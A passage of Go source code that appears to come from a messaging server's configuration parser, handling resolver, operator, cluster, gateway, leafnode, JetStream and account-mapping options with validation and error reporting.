*errors = append(*errors, err)
return
}
if dur < 30*time.Second {
err := &configErr{tk, fmt.Sprintf("invalid lame_duck_duration of %v, minimum is 30 seconds", dur)}
*errors = append(*errors, err)
return
}
o.LameDuckDuration = dur
case "lame_duck_grace_period":
dur, err := time.ParseDuration(v.(string))
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing lame_duck_grace_period: %v", err)}
*errors = append(*errors, err)
return
}
if dur < 0 {
err := &configErr{tk, "invalid lame_duck_grace_period, needs to be positive"}
*errors = append(*errors, err)
return
}
o.LameDuckGracePeriod = dur
case "operator", "operators", "roots", "root", "root_operators", "root_operator":
opFiles := []string{}
switch v := v.(type) {
case string:
opFiles = append(opFiles, v)
case []string:
opFiles = append(opFiles, v...)
default:
err := &configErr{tk, fmt.Sprintf("error parsing operators: unsupported type %T", v)}
*errors = append(*errors, err)
}
// Assume for now these are file names, but they can also be the JWT itself inline.
o.TrustedOperators = make([]*jwt.OperatorClaims, 0, len(opFiles))
for _, fname := range opFiles {
opc, err := ReadOperatorJWT(fname)
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing operator JWT: %v", err)}
*errors = append(*errors, err)
continue
}
o.TrustedOperators = append(o.TrustedOperators, opc)
}
if len(o.TrustedOperators) == 1 {
// In case "resolver" is defined as well, it takes precedence
if o.AccountResolver == nil {
if accUrl, err := parseURL(o.TrustedOperators[0].AccountServerURL, "account resolver"); err == nil {
// nsc automatically appends "/accounts" during nsc push
o.AccountResolver, _ = NewURLAccResolver(accUrl.String() + "/accounts")
}
}
// In case "system_account" is defined as well, it takes precedence
if o.SystemAccount == "" {
o.SystemAccount = o.TrustedOperators[0].SystemAccount
}
}
case "resolver", "account_resolver", "accounts_resolver":
switch v := v.(type) {
case string:
// "resolver" takes precedence over value obtained from "operator".
// Clear so that parsing errors are not silently ignored.
o.AccountResolver = nil
memResolverRe := regexp.MustCompile(`(?i)(MEM|MEMORY)\s*`)
resolverRe := regexp.MustCompile(`(?i)(?:URL){1}(?:\({1}\s*"?([^\s"]*)"?\s*\){1})?\s*`)
if memResolverRe.MatchString(v) {
o.AccountResolver = &MemAccResolver{}
} else if items := resolverRe.FindStringSubmatch(v); len(items) == 2 {
url := items[1]
_, err := parseURL(url, "account resolver")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
if ur, err := NewURLAccResolver(url); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
} else {
o.AccountResolver = ur
}
}
case map[string]interface{}:
del := false
dir := ""
dirType := ""
limit := int64(0)
ttl := time.Duration(0)
sync := time.Duration(0)
var err error
if v, ok := v["dir"]; ok {
_, v := unwrapValue(v, <)
dir = v.(string)
}
if v, ok := v["type"]; ok {
_, v := unwrapValue(v, <)
dirType = v.(string)
}
if v, ok := v["allow_delete"]; ok {
_, v := unwrapValue(v, <)
del = v.(bool)
}
if v, ok := v["limit"]; ok {
_, v := unwrapValue(v, <)
limit = v.(int64)
}
if v, ok := v["ttl"]; ok {
_, v := unwrapValue(v, <)
ttl, err = time.ParseDuration(v.(string))
}
if v, ok := v["interval"]; err == nil && ok {
_, v := unwrapValue(v, <)
sync, err = time.ParseDuration(v.(string))
}
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
if dir == "" {
*errors = append(*errors, &configErr{tk, "dir has no value and needs to point to a directory"})
return
}
if info, _ := os.Stat(dir); info != nil && (!info.IsDir() || info.Mode().Perm()&(1<<(uint(7))) == 0) {
*errors = append(*errors, &configErr{tk, "dir needs to point to an accessible directory"})
return
}
var res AccountResolver
switch strings.ToUpper(dirType) {
case "CACHE":
if sync != 0 {
*errors = append(*errors, &configErr{tk, "CACHE does not accept sync"})
}
if del {
*errors = append(*errors, &configErr{tk, "CACHE does not accept allow_delete"})
}
res, err = NewCacheDirAccResolver(dir, limit, ttl)
case "FULL":
if ttl != 0 {
*errors = append(*errors, &configErr{tk, "FULL does not accept ttl"})
}
res, err = NewDirAccResolver(dir, limit, sync, del)
}
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
o.AccountResolver = res
default:
err := &configErr{tk, fmt.Sprintf("error parsing operator resolver, wrong type %T", v)}
*errors = append(*errors, err)
return
}
if o.AccountResolver == nil {
err := &configErr{tk, "error parsing account resolver, should be MEM or " +
" URL(\"url\") or a map containing dir and type state=[FULL|CACHE])"}
*errors = append(*errors, err)
}
case "resolver_tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
return
}
if o.AccountResolverTLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
case "resolver_preload":
mp, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "preload should be a map of account_public_key:account_jwt"}
*errors = append(*errors, err)
return
}
o.resolverPreloads = make(map[string]string)
for key, val := range mp {
tk, val = unwrapValue(val, <)
if jwtstr, ok := val.(string); !ok {
err := &configErr{tk, "preload map value should be a string JWT"}
*errors = append(*errors, err)
continue
} else {
// Make sure this is a valid account JWT, that is a config error.
// We will warn of expirations, etc later.
if _, err := jwt.DecodeAccountClaims(jwtstr); err != nil {
err := &configErr{tk, "invalid account JWT"}
*errors = append(*errors, err)
continue
}
o.resolverPreloads[key] = jwtstr
}
}
case "no_auth_user":
o.NoAuthUser = v.(string)
case "system_account", "system":
// Already processed at the beginning so we just skip them
// to not treat them as unknown values.
return
case "no_system_account", "no_system", "no_sys_acc":
o.NoSystemAccount = v.(bool)
case "no_header_support":
o.NoHeaderSupport = v.(bool)
case "trusted", "trusted_keys":
switch v := v.(type) {
case string:
o.TrustedKeys = []string{v}
case []string:
o.TrustedKeys = v
case []interface{}:
keys := make([]string, 0, len(v))
for _, mv := range v {
tk, mv = unwrapValue(mv, <)
if key, ok := mv.(string); ok {
keys = append(keys, key)
} else {
err := &configErr{tk, fmt.Sprintf("error parsing trusted: unsupported type in array %T", mv)}
*errors = append(*errors, err)
continue
}
}
o.TrustedKeys = keys
default:
err := &configErr{tk, fmt.Sprintf("error parsing trusted: unsupported type %T", v)}
*errors = append(*errors, err)
}
// Do a quick sanity check on keys
for _, key := range o.TrustedKeys {
if !nkeys.IsValidPublicOperatorKey(key) {
err := &configErr{tk, fmt.Sprintf("trust key %q required to be a valid public operator nkey", key)}
*errors = append(*errors, err)
}
}
case "connect_error_reports":
o.ConnectErrorReports = int(v.(int64))
case "reconnect_error_reports":
o.ReconnectErrorReports = int(v.(int64))
case "websocket", "ws":
if err := parseWebsocket(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
case "mqtt":
if err := parseMQTT(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
default:
if au := atomic.LoadInt32(&allowUnknownTopLevelField); au == 0 && !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
}
}
func parseDuration(field string, tk token, v interface{}, errors *[]error, warnings *[]error) time.Duration {
if wd, ok := v.(string); ok {
if dur, err := time.ParseDuration(wd); err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing %s: %v", field, err)}
*errors = append(*errors, err)
return 0
} else {
return dur
}
} else {
// Backward compatible with old type, assume this is the
// number of seconds.
err := &configWarningErr{
field: field,
configErr: configErr{
token: tk,
reason: field + " should be converted to a duration",
},
}
*warnings = append(*warnings, err)
return time.Duration(v.(int64)) * time.Second
}
}
func trackExplicitVal(opts *Options, pm *map[string]bool, name string, val bool) {
m := *pm
if m == nil {
m = make(map[string]bool)
*pm = m
}
m[name] = val
}
// hostPort is simple struct to hold parsed listen/addr strings.
type hostPort struct {
host string
port int
}
// parseListen will parse listen option which is replacing host/net and port
func parseListen(v interface{}) (*hostPort, error) {
hp := &hostPort{}
switch vv := v.(type) {
// Only a port
case int64:
hp.port = int(vv)
case string:
host, port, err := net.SplitHostPort(vv)
if err != nil {
return nil, fmt.Errorf("could not parse address string %q", vv)
}
hp.port, err = strconv.Atoi(port)
if err != nil {
return nil, fmt.Errorf("could not parse port %q", port)
}
hp.host = host
default:
return nil, fmt.Errorf("expected port or host:port, got %T", vv)
}
return hp, nil
}
// parseCluster will parse the cluster config.
func parseCluster(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
cm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected map to define cluster, got %T", v)}
}
for mk, mv := range cm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "name":
opts.Cluster.Name = mv.(string)
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.Cluster.Host = hp.host
opts.Cluster.Port = hp.port
case "port":
opts.Cluster.Port = int(mv.(int64))
case "host", "net":
opts.Cluster.Host = mv.(string)
case "authorization":
auth, err := parseAuthorization(tk, opts, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if auth.users != nil {
err := &configErr{tk, "Cluster authorization does not allow multiple users"}
*errors = append(*errors, err)
continue
}
opts.Cluster.Username = auth.user
opts.Cluster.Password = auth.pass
opts.Cluster.AuthTimeout = auth.timeout
if auth.defaultPermissions != nil {
err := &configWarningErr{
field: mk,
configErr: configErr{
token: tk,
reason: `setting "permissions" within cluster authorization block is deprecated`,
},
}
*warnings = append(*warnings, err)
// Do not set permissions if they were specified in top-level cluster block.
if opts.Cluster.Permissions == nil {
setClusterPermissions(&opts.Cluster, auth.defaultPermissions)
}
}
case "routes":
ra := mv.([]interface{})
routes, errs := parseURLs(ra, "route")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
opts.Routes = routes
case "tls":
config, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.Cluster.TLSConfig = config
opts.Cluster.TLSTimeout = tlsopts.Timeout
opts.Cluster.TLSMap = tlsopts.Map
opts.Cluster.TLSCheckKnownURLs = tlsopts.TLSCheckKnownURLs
case "cluster_advertise", "advertise":
opts.Cluster.Advertise = mv.(string)
case "no_advertise":
opts.Cluster.NoAdvertise = mv.(bool)
trackExplicitVal(opts, &opts.inConfig, "Cluster.NoAdvertise", opts.Cluster.NoAdvertise)
case "connect_retries":
opts.Cluster.ConnectRetries = int(mv.(int64))
case "permissions":
perms, err := parseUserPermissions(mv, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
// Dynamic response permissions do not make sense here.
if perms.Response != nil {
err := &configErr{tk, "Cluster permissions do not support dynamic responses"}
*errors = append(*errors, err)
continue
}
// This will possibly override permissions that were define in auth block
setClusterPermissions(&opts.Cluster, perms)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
func parseURLs(a []interface{}, typ string) (urls []*url.URL, errors []error) {
urls = make([]*url.URL, 0, len(a))
var lt token
defer convertPanicToErrorList(<, &errors)
for _, u := range a {
tk, u := unwrapValue(u, <)
sURL := u.(string)
url, err := parseURL(sURL, typ)
if err != nil {
err := &configErr{tk, err.Error()}
errors = append(errors, err)
continue
}
urls = append(urls, url)
}
return urls, errors
}
func parseURL(u string, typ string) (*url.URL, error) {
urlStr := strings.TrimSpace(u)
url, err := url.Parse(urlStr)
if err != nil {
return nil, fmt.Errorf("error parsing %s url [%q]", typ, urlStr)
}
return url, nil
}
func parseGateway(v interface{}, o *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
gm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected gateway to be a map, got %T", v)}
}
for mk, mv := range gm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "name":
o.Gateway.Name = mv.(string)
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
o.Gateway.Host = hp.host
o.Gateway.Port = hp.port
case "port":
o.Gateway.Port = int(mv.(int64))
case "host", "net":
o.Gateway.Host = mv.(string)
case "authorization":
auth, err := parseAuthorization(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
if auth.users != nil {
*errors = append(*errors, &configErr{tk, "Gateway authorization does not allow multiple users"})
continue
}
o.Gateway.Username = auth.user
o.Gateway.Password = auth.pass
o.Gateway.AuthTimeout = auth.timeout
case "tls":
config, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
o.Gateway.TLSConfig = config
o.Gateway.TLSTimeout = tlsopts.Timeout
o.Gateway.TLSMap = tlsopts.Map
o.Gateway.TLSCheckKnownURLs = tlsopts.TLSCheckKnownURLs
case "advertise":
o.Gateway.Advertise = mv.(string)
case "connect_retries":
o.Gateway.ConnectRetries = int(mv.(int64))
case "gateways":
gateways, err := parseGateways(mv, errors, warnings)
if err != nil {
return err
}
o.Gateway.Gateways = gateways
case "reject_unknown", "reject_unknown_cluster":
o.Gateway.RejectUnknown = mv.(bool)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
var dynamicJSAccountLimits = &JetStreamAccountLimits{-1, -1, -1, -1}
// Parses jetstream account limits for an account. Simple setup with boolen is allowed, and we will
// use dynamic account limits.
func parseJetStreamForAccount(v interface{}, acc *Account, errors *[]error, warnings *[]error) error {
var lt token
tk, v := unwrapValue(v, <)
// Value here can be bool, or string "enabled" or a map.
switch vv := v.(type) {
case bool:
if vv {
acc.jsLimits = dynamicJSAccountLimits
}
case string:
switch strings.ToLower(vv) {
case "enabled", "enable":
acc.jsLimits = dynamicJSAccountLimits
case "disabled", "disable":
acc.jsLimits = nil
default:
return &configErr{tk, fmt.Sprintf("Expected 'enabled' or 'disabled' for string value, got '%s'", vv)}
}
case map[string]interface{}:
jsLimits := &JetStreamAccountLimits{-1, -1, -1, -1}
for mk, mv := range vv {
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "max_memory", "max_mem", "mem", "memory":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxMemory = int64(vv)
case "max_store", "max_file", "max_disk", "store", "disk":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxStore = int64(vv)
case "max_streams", "streams":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxStreams = int(vv)
case "max_consumers", "consumers":
vv, ok := mv.(int64)
if !ok {
return &configErr{tk, fmt.Sprintf("Expected a parseable size for %q, got %v", mk, mv)}
}
jsLimits.MaxConsumers = int(vv)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
acc.jsLimits = jsLimits
default:
return &configErr{tk, fmt.Sprintf("Expected map, bool or string to define JetStream, got %T", v)}
}
return nil
}
// Parse enablement of jetstream for a server.
func parseJetStream(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
tk, v := unwrapValue(v, <)
// Value here can be bool, or string "enabled" or a map.
switch vv := v.(type) {
case bool:
opts.JetStream = v.(bool)
case string:
switch strings.ToLower(vv) {
case "enabled", "enable":
opts.JetStream = true
case "disabled", "disable":
opts.JetStream = false
default:
return &configErr{tk, fmt.Sprintf("Expected 'enabled' or 'disabled' for string value, got '%s'", vv)}
}
case map[string]interface{}:
for mk, mv := range vv {
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "store_dir", "storedir":
opts.StoreDir = mv.(string)
case "max_memory_store", "max_mem_store", "max_mem":
opts.JetStreamMaxMemory = mv.(int64)
case "max_file_store", "max_file":
opts.JetStreamMaxStore = mv.(int64)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
opts.JetStream = true
default:
return &configErr{tk, fmt.Sprintf("Expected map, bool or string to define JetStream, got %T", v)}
}
return nil
}
// parseLeafNodes will parse the leaf node config.
func parseLeafNodes(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
cm, ok := v.(map[string]interface{})
if !ok {
return &configErr{tk, fmt.Sprintf("Expected map to define a leafnode, got %T", v)}
}
for mk, mv := range cm {
// Again, unwrap token value if line check is required.
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "listen":
hp, err := parseListen(mv)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.LeafNode.Host = hp.host
opts.LeafNode.Port = hp.port
case "port":
opts.LeafNode.Port = int(mv.(int64))
case "host", "net":
opts.LeafNode.Host = mv.(string)
case "authorization":
auth, err := parseLeafAuthorization(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.LeafNode.Username = auth.user
opts.LeafNode.Password = auth.pass
opts.LeafNode.AuthTimeout = auth.timeout
opts.LeafNode.Account = auth.acc
opts.LeafNode.Users = auth.users
// Validate user info config for leafnode authorization
if err := validateLeafNodeAuthOptions(opts); err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
case "remotes":
// Parse the remote options here.
remotes, err := parseRemoteLeafNodes(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
opts.LeafNode.Remotes = remotes
case "reconnect", "reconnect_delay", "reconnect_interval":
opts.LeafNode.ReconnectInterval = time.Duration(int(mv.(int64))) * time.Second
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if opts.LeafNode.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
continue
}
opts.LeafNode.TLSTimeout = tc.Timeout
case "leafnode_advertise", "advertise":
opts.LeafNode.Advertise = mv.(string)
case "no_advertise":
opts.LeafNode.NoAdvertise = mv.(bool)
trackExplicitVal(opts, &opts.inConfig, "LeafNode.NoAdvertise", opts.LeafNode.NoAdvertise)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
return nil
}
// This is the authorization parser adapter for the leafnode's
// authorization config.
func parseLeafAuthorization(v interface{}, errors *[]error, warnings *[]error) (*authorization, error) {
var (
am map[string]interface{}
tk token
lt token
auth = &authorization{}
)
defer convertPanicToErrorList(<, errors)
_, v = unwrapValue(v, <)
am = v.(map[string]interface{})
for mk, mv := range am {
tk, mv = unwrapValue(mv, <)
switch strings.ToLower(mk) {
case "user", "username":
auth.user = mv.(string)
case "pass", "password":
auth.pass = mv.(string)
case "timeout":
at := float64(1)
switch mv := mv.(type) {
case int64:
at = float64(mv)
case float64:
at = mv
}
auth.timeout = at
case "users":
users, err := parseLeafUsers(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
auth.users = users
case "account":
auth.acc = mv.(string)
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: mk,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
}
continue
}
}
return auth, nil
}
// This is a trimmed down version of parseUsers that is adapted
// for the users possibly defined in the authorization{} section
// of leafnodes {}.
func parseLeafUsers(mv interface{}, errors *[]error, warnings *[]error) ([]*User, error) {
var (
tk token
lt token
users = []*User{}
)
defer convertPanicToErrorList(<, errors)
tk, mv = unwrapValue(mv, <)
// Make sure we have an array
uv, ok := mv.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected users field to be an array, got %v", mv)}
}
for _, u := range uv {
tk, u = unwrapValue(u, <)
// Check its a map/struct
um, ok := u.(map[string]interface{})
if !ok {
err := &configErr{tk, fmt.Sprintf("Expected user entry to be a map/struct, got %v", u)}
*errors = append(*errors, err)
continue
}
user := &User{}
for k, v := range um {
tk, v = unwrapValue(v, <)
switch strings.ToLower(k) {
case "user", "username":
user.Username = v.(string)
case "pass", "password":
user.Password = v.(string)
case "account":
// We really want to save just the account name here, but
// the User object is *Account. So we create an account object
// but it won't be registered anywhere. The server will just
// use opts.LeafNode.Users[].Account.Name. Alternatively
// we need to create internal objects to store u/p and account
// name and have a server structure to hold that.
user.Account = NewAccount(v.(string))
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
users = append(users, user)
}
return users, nil
}
func parseRemoteLeafNodes(v interface{}, errors *[]error, warnings *[]error) ([]*RemoteLeafOpts, error) {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
ra, ok := v.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected remotes field to be an array, got %T", v)}
}
remotes := make([]*RemoteLeafOpts, 0, len(ra))
for _, r := range ra {
tk, r = unwrapValue(r, <)
// Check its a map/struct
rm, ok := r.(map[string]interface{})
if !ok {
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected remote leafnode entry to be a map/struct, got %v", r)})
continue
}
remote := &RemoteLeafOpts{}
for k, v := range rm {
tk, v = unwrapValue(v, <)
switch strings.ToLower(k) {
case "url", "urls":
switch v := v.(type) {
case []interface{}, []string:
urls, errs := parseURLs(v.([]interface{}), "leafnode")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
remote.URLs = urls
case string:
url, err := parseURL(v, "leafnode")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
remote.URLs = append(remote.URLs, url)
default:
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected remote leafnode url to be an array or string, got %v", v)})
continue
}
case "account", "local":
remote.LocalAccount = v.(string)
case "creds", "credentials":
p, err := expandPath(v.(string))
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
remote.Credentials = p
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
continue
}
if remote.TLSConfig, err = GenTLSConfig(tc); err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
// If ca_file is defined, GenTLSConfig() sets TLSConfig.ClientCAs.
// Set RootCAs since this tls.Config is used when soliciting
// a connection (therefore behaves as a client).
remote.TLSConfig.RootCAs = remote.TLSConfig.ClientCAs
if tc.Timeout > 0 {
remote.TLSTimeout = tc.Timeout
} else {
remote.TLSTimeout = float64(DEFAULT_LEAF_TLS_TIMEOUT)
}
case "hub":
remote.Hub = v.(bool)
case "deny_imports", "deny_import":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
remote.DenyImports = subjects
case "deny_exports", "deny_export":
subjects, err := parseSubjects(tk, errors, warnings)
if err != nil {
*errors = append(*errors, err)
continue
}
remote.DenyExports = subjects
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
remotes = append(remotes, remote)
}
return remotes, nil
}
// Parse TLS and returns a TLSConfig and TLSTimeout.
// Used by cluster and gateway parsing.
func getTLSConfig(tk token) (*tls.Config, *TLSConfigOpts, error) {
tc, err := parseTLS(tk, false)
if err != nil {
return nil, nil, err
}
config, err := GenTLSConfig(tc)
if err != nil {
err := &configErr{tk, err.Error()}
return nil, nil, err
}
// For clusters/gateways, we will force strict verification. We also act
// as both client and server, so will mirror the rootCA to the
// clientCA pool.
config.ClientAuth = tls.RequireAndVerifyClientCert
config.RootCAs = config.ClientCAs
return config, tc, nil
}
func parseGateways(v interface{}, errors *[]error, warnings *[]error) ([]*RemoteGatewayOpts, error) {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
// Make sure we have an array
ga, ok := v.([]interface{})
if !ok {
return nil, &configErr{tk, fmt.Sprintf("Expected gateways field to be an array, got %T", v)}
}
gateways := []*RemoteGatewayOpts{}
for _, g := range ga {
tk, g = unwrapValue(g, <)
// Check its a map/struct
gm, ok := g.(map[string]interface{})
if !ok {
*errors = append(*errors, &configErr{tk, fmt.Sprintf("Expected gateway entry to be a map/struct, got %v", g)})
continue
}
gateway := &RemoteGatewayOpts{}
for k, v := range gm {
tk, v = unwrapValue(v, <)
switch strings.ToLower(k) {
case "name":
gateway.Name = v.(string)
case "tls":
tls, tlsopts, err := getTLSConfig(tk)
if err != nil {
*errors = append(*errors, err)
continue
}
gateway.TLSConfig = tls
gateway.TLSTimeout = tlsopts.Timeout
case "url":
url, err := parseURL(v.(string), "gateway")
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
continue
}
gateway.URLs = append(gateway.URLs, url)
case "urls":
urls, errs := parseURLs(v.([]interface{}), "gateway")
if errs != nil {
*errors = append(*errors, errs...)
continue
}
gateway.URLs = urls
default:
if !tk.IsUsedVariable() {
err := &unknownConfigFieldErr{
field: k,
configErr: configErr{
token: tk,
},
}
*errors = append(*errors, err)
continue
}
}
}
gateways = append(gateways, gateway)
}
return gateways, nil
}
// Sets cluster's permissions based on given pub/sub permissions,
// doing the appropriate translation.
func setClusterPermissions(opts *ClusterOpts, perms *Permissions) {
// Import is whether or not we will send a SUB for interest to the other side.
// Export is whether or not we will accept a SUB from the remote for a given subject.
// Both only effect interest registration.
// The parsing sets Import into Publish and Export into Subscribe, convert
// accordingly.
opts.Permissions = &RoutePermissions{
Import: perms.Publish,
Export: perms.Subscribe,
}
}
// Temp structures to hold account import and export defintions since they need
// to be processed after being parsed.
type export struct {
acc *Account
sub string
accs []string
rt ServiceRespType
lat *serviceLatency
rthr time.Duration
}
type importStream struct {
acc *Account
an string
sub string
to string
pre string
}
type importService struct {
acc *Account
an string
sub string
to string
share bool
}
// Checks if an account name is reserved.
func isReservedAccount(name string) bool {
return name == globalAccountName
}
func parseAccountMapDest(v interface{}, tk token, errors *[]error, warnings *[]error) (*MapDest, *configErr) {
// These should be maps.
mv, ok := v.(map[string]interface{})
if !ok {
err := &configErr{tk, "Expected an entry for the mapping destination"}
*errors = append(*errors, err)
return nil, err
}
mdest := &MapDest{}
var lt token
var sw bool
for k, v := range mv {
tk, dmv := unwrapValue(v, <)
switch strings.ToLower(k) {
case "dest", "destination":
mdest.Subject = dmv.(string)
case "weight":
switch vv := dmv.(type) {
case string:
ws := vv
if strings.HasSuffix(ws, "%") {
ws = ws[:len(ws)-1]
}
weight, err := strconv.Atoi(ws)
if err != nil {
err := &configErr{tk, fmt.Sprintf("Invalid weight %q for mapping destination", ws)}
*errors = append(*errors, err)
return nil, err
}
if weight > 100 || weight < 0 {
err := &configErr{tk, fmt.Sprintf("Invalid weight %d for mapping destination", weight)}
*errors = append(*errors, err)
return nil, err
}
mdest.Weight = uint8(weight)
sw = true
case int64:
weight := vv
if weight > 100 || weight < 0 {
err := &configErr{tk, fmt.Sprintf("Invalid weight %d for mapping destination", weight)}
*errors = append(*errors, err)
return nil, err
}
mdest.Weight = uint8(weight)
sw = true
default:
err := &configErr{tk, fmt.Sprintf("Unknown entry type for weight of %v\n", vv)}
*errors = append(*errors, err)
return nil, err
}
case "cluster":
mdest.OptCluster = dmv.(string)
default:
err := &configErr{tk, fmt.Sprintf("Unknown field %q for mapping destination", k)}
*errors = append(*errors, err)
return nil, err
}
}
if !sw {
err := &configErr{tk, fmt.Sprintf("Missing weight for mapping destination %q", mdest.Subject)}
*errors = append(*errors, err)
return nil, err
}
return mdest, nil
}
// parseAccountMappings is called to parse account mappings.
func parseAccountMappings(v interface{}, acc *Account, errors *[]error, warnings *[]error) error {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
am := v.(map[string]interface{})
for subj, mv := range am {
if !IsValidSubject(subj) {
err := &configErr{tk, fmt.Sprintf("Subject %q is not a valid subject", subj)}
*errors = append(*errors, err)
continue
}
tk, v := unwrapValue(mv, <)
switch vv := v.(type) {
case string:
if err := acc.AddMapping(subj, v.(string)); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
case []interface{}:
var mappings []*MapDest
for _, mv := range v.([]interface{}) {
tk, amv := unwrapValue(mv, <)
mdest, err := parseAccountMapDest(amv, tk, errors, warnings)
if err != nil {
continue
}
mappings = append(mappings, mdest)
}
// Now add them in..
if err := acc.AddWeightedMappings(subj, mappings...); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
case interface{}:
tk, amv := unwrapValue(mv, <)
mdest, err := parseAccountMapDest(amv, tk, errors, warnings)
if err != nil {
continue
}
// Now add it in..
if err := acc.AddWeightedMappings(subj, mdest); err != nil {
err := &configErr{tk, fmt.Sprintf("Error adding mapping for %q: %v", subj, err)}
*errors = append(*errors, err)
continue
}
default:
err := &configErr{tk, fmt.Sprintf("Unknown type %T for mapping destination", vv)}
*errors = append(*errors, err)
continue
}
}
return nil
}
// parseAccounts will parse the different accounts syntax.
func parseAccounts(v interface{}, opts *Options, errors *[]error, warnings *[]error) error {
var (
importStreams []*importStream
importServices []*importService
exportStreams []*export
exportServices []*export
lt token
)
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
switch vv := v.(type) {
// Simple array of account names.
case []interface{}, []string:
